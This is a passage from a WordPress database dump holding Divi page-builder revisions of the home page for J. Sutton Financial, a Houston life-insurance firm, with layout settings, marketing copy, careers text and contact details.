global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 21:20:41','2023-04-08 21:20:41','',138,'http://cmdev-site1.com/?p=869',0,'revision','',0),(868,1,'2023-04-08 21:19:57','2023-04-08 21:19:57','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu submenu_direction=\"downwards\" active_link_color=\"#FFFFFF\" dropdown_menu_bg_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_text_color=\"#000000\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" mobile_menu_bg_color_tablet=\"#FFFFFF\" mobile_menu_bg_color_phone=\"#FFFFFF\" mobile_menu_bg_color_last_edited=\"on|phone\" logo_width_tablet=\"20%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_margin_tablet=\"-43px|||0px|false|false\" custom_margin_phone=\"-10px||||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" dropdown_menu_bg_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover_enabled=\"on|desktop\" dropdown_menu_bg_color__hover=\"#FFFFFF\" mobile_menu_text_color__hover=\"#000000\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-12px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|desktop\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/products-services/\" button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|||150px|false|false\" custom_margin_tablet=\"|||150px|false|false\" custom_margin_phone=\"|||0px|false|false\" custom_margin_last_edited=\"on|phone\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/careers/\" button_text=\"Work for Us\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|150px|||false|false\" custom_margin_tablet=\"|150px|||false|false\" custom_margin_phone=\"|0px|||false|false\" custom_margin_last_edited=\"on|desktop\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"||||false|false\" custom_margin_tablet=\"|37px||89px|false|false\" custom_margin_phone=\"|0px||0px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" hover_enabled=\"0\" global_colors_info=\"{}\" custom_padding_last_edited=\"on|phone\" custom_padding_phone=\"0px|0px|||false|false\" sticky_enabled=\"0\" width_last_edited=\"on|desktop\" module_alignment=\"right\" align=\"center\" always_center_on_mobile=\"off\" custom_padding_tablet=\"33px|1px||||\" width_tablet=\"70%\" width_phone=\"70%\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<h2><strong>Providing Premium Life Insurance Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 21:19:57','2023-04-08 21:19:57','',138,'http://cmdev-site1.com/?p=868',0,'revision','',0),(877,1,'2023-04-08 21:31:47','2023-04-08 21:31:47','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu submenu_direction=\"downwards\" active_link_color=\"#FFFFFF\" dropdown_menu_bg_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_text_color=\"#000000\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" mobile_menu_bg_color_tablet=\"#FFFFFF\" mobile_menu_bg_color_phone=\"#FFFFFF\" mobile_menu_bg_color_last_edited=\"on|phone\" logo_width_tablet=\"20%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_margin_tablet=\"-43px|||0px|false|false\" custom_margin_phone=\"-10px||||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" dropdown_menu_bg_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover_enabled=\"on|desktop\" dropdown_menu_bg_color__hover=\"#FFFFFF\" mobile_menu_text_color__hover=\"#000000\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-12px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|desktop\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/products-services/\" button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|||150px|false|false\" custom_margin_tablet=\"|||150px|false|false\" custom_margin_phone=\"|||0px|false|false\" custom_margin_last_edited=\"on|phone\" global_colors_info=\"{}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/careers/\" button_text=\"Work for Us\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|150px|||false|false\" custom_margin_tablet=\"|150px|||false|false\" custom_margin_phone=\"|0px|||false|false\" custom_margin_last_edited=\"on|desktop\" global_colors_info=\"{}\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" align=\"center\" always_center_on_mobile=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" width_tablet=\"70%\" width_phone=\"50%\" width_last_edited=\"on|desktop\" module_alignment=\"right\" custom_margin=\"||||false|false\" custom_margin_tablet=\"|37px||89px|false|false\" custom_margin_phone=\"|0px||0px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"33px|1px||||\" custom_padding_tablet=\"33px|1px||||\" custom_padding_phone=\"0px|0px|||false|false\" custom_padding_last_edited=\"on|phone\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" module_alignment_tablet=\"center\" module_alignment_phone=\"center\" module_alignment_last_edited=\"on|desktop\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" always_center_on_mobile=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" width_tablet=\"70%\" width_phone=\"50%\" width_last_edited=\"on|desktop\" module_alignment=\"left\" custom_margin=\"|||0px||\" custom_margin_tablet=\"|||0px||\" custom_margin_phone=\"|||0px||\" custom_margin_last_edited=\"on|desktop\" custom_padding=\"|||0px||\" animation_direction=\"left\" module_alignment_tablet=\"center\" module_alignment_phone=\"center\" module_alignment_last_edited=\"on|phone\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" hover_enabled=\"0\" global_colors_info=\"{}\" width_last_edited=\"on|phone\" sticky_enabled=\"0\" width_phone=\"75%\" width_tablet=\"75%\" module_alignment=\"center\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" 